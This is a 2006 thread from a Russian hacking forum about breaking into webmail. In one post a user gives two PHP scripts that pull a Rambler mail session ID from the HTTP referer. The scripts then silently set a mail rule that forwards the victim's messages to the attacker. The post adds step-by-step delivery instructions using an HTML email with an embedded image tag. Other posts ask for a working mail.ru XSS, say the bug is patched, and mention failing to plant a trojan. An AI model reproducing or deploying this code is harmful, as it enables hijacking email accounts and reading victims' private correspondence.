ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 21.02.2006, 21:53
seeattact
Banned
Регистрация: 12.01.2006
Сообщений: 621
Провел на форуме:
1425186

Репутация: 121


Отправить сообщение для seeattact с помощью ICQ
По умолчанию

Для таких как ты даже видео есть http://video.antichat.net/file65.html
 
Ответить с цитированием

  #22  
Старый 21.02.2006, 22:03
$ZLO$
Участник форума
Регистрация: 15.01.2005
Сообщений: 119
Провел на форуме:
250370

Репутация: 16
По умолчанию

есть действующий XSS на mail.ru ?
 
Ответить с цитированием

  #23  
Старый 21.02.2006, 23:43
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
По умолчанию

Ну имхо ...вот скрипты для того что бы читать чужие письма не рамблере , дело в том что есть два бага на рамблере ... один старый баг а один новый .... под словом старый баг имеется виду что мыло должна быть старой ... то есть старой регистрации ( где то 2002 - 2003 год) и вот скрипт

Код:
<?
$adr = "".getenv("HTTP_REFERER")."";
$id = substr("$adr", 31, 36);
$url = "http://mail.rambler.ru/Session/$id/Rules.wssp?Redirect=1&RedirKeep=1&KeepToAndCc=1&RedirectText=Ваше мыло@rambler.ru&Update=Сохранить%20изменения";

header("Location: $url");

?>
а вот и новый баг

Код:
<?
$adr = "".getenv("HTTP_REFERER")."";
$id = substr("$adr", 31, 35);
$url = "http://mail.rambler.ru/Session/$id/Rules.wssp?Redirect=1&RedirKeep=1&KeepToAndCc=1&RedirectText=Ваше мыло@rambler.ru&Update=Сохранить%20изменения";

header("Location: $url");

?>
Применяется так : залеваете на хост и пишете письмо жертве вот с таким кодом
Код:
<img src="http://сайт/Новая или старая.php"></img>
обязательно при отправке сообщения вставьте галочку на отправит в виде HTML .
После того как жертва откроет письмо то все ее письма перенаправится на вашу почту , с того дня как жертва откроет ваше письмо.
 
Ответить с цитированием

  #24  
Старый 22.02.2006, 23:15
Fagot
Новичок
Регистрация: 04.03.2005
Сообщений: 17
Провел на форуме:
14620

Репутация: 0
Отправить сообщение для Fagot с помощью ICQ
По умолчанию

Ты не поверишь, специально завёл на рамблере почту,залил на хост пхп - да вот не приходит мне на мыло письмо
 
Ответить с цитированием

  #25  
Старый 23.02.2006, 02:14
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию

Цитата:
Сообщение от Fagot  
Ты не поверишь, специально завёл на рамблере почту,залил на хост пхп - да вот не приходит мне на мыло письмо
Кстати, тоже так делал, послал 3 письма с разных анонимных мэйлеров - одно нормально пришло. как картинка, а другое порсто код хтмл. Походу тот анонимайзер не потдерживал хтмл или че-нить типа того. Кароче не пахает уже это на рамблере походу (новую юзал).
Второе письмо по идее должно было уже переслаться, но не получилось...
 
Ответить с цитированием

  #26  
Старый 23.02.2006, 04:10
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
По умолчанию

Нужно что бы у жертвы был мыло на рамблере это само собой , но и у тебя тоже так как другие почтовики не очень то поддерживают отправку в виде Html как это делает рамблер...
Да и еще ...код творит на почте жертвы вот что: Если вы там копались в фильтрах то поймете что он там вписывает вашу почту и постовляет галку "Сохранить изменения"
И признаюсь что после того как на рамблере сделали абгрейд я баг не тестил.
 
Ответить с цитированием

  #27  
Старый 23.02.2006, 11:08
porter
Познающий
Регистрация: 01.03.2005
Сообщений: 80
Провел на форуме:
606375

Репутация: 12
По умолчанию

Бага давно не работает уже.
 
Ответить с цитированием

  #28  
Старый 23.02.2006, 12:11
ViK_WS
Познающий
Регистрация: 29.01.2006
Сообщений: 47
Провел на форуме:
177848

Репутация: -9
Отправить сообщение для ViK_WS с помощью ICQ
По умолчанию

мля почему у мя не получается трояна впарить вроде всё по инструкции делаю???
 
Ответить с цитированием

  #29  
Старый 23.02.2006, 16:21
seeattact
Banned
Регистрация: 12.01.2006
Сообщений: 621
Провел на форуме:
1425186

Репутация: 121


Отправить сообщение для seeattact с помощью ICQ
По умолчанию

Цитата:
Сообщение от ViK_WS  
мля почему у мя не получается трояна впарить вроде всё по инструкции делаю???
Слушай ты хоть что нибудь умееш?
Еслиб ты всё по инструкции делал - у тебя бы всё получилось.
Для таких как ты видео есть.
 
Ответить с цитированием

  #30  
Старый 23.02.2006, 16:23
ViK_WS
Познающий
Регистрация: 29.01.2006
Сообщений: 47
Провел на форуме:
177848

Репутация: -9
Отправить сообщение для ViK_WS с помощью ICQ
По умолчанию

Представь себе не умею я тока учусь мля я прсто прошу помоч в моих начинаниях!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
zmail.ru: Сниффер и сессии. Читаем чужие письма. KEZ Комментарии к видео 2 10.10.2005 19:01
Читаем чужие письма на mail.ru через сессии petrovich-lamer E-Mail 30 12.05.2005 17:19
Читаем чужие письма на mail.ru через сессии petrovich-lamer Комментарии к видео 5 24.04.2005 15:55



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ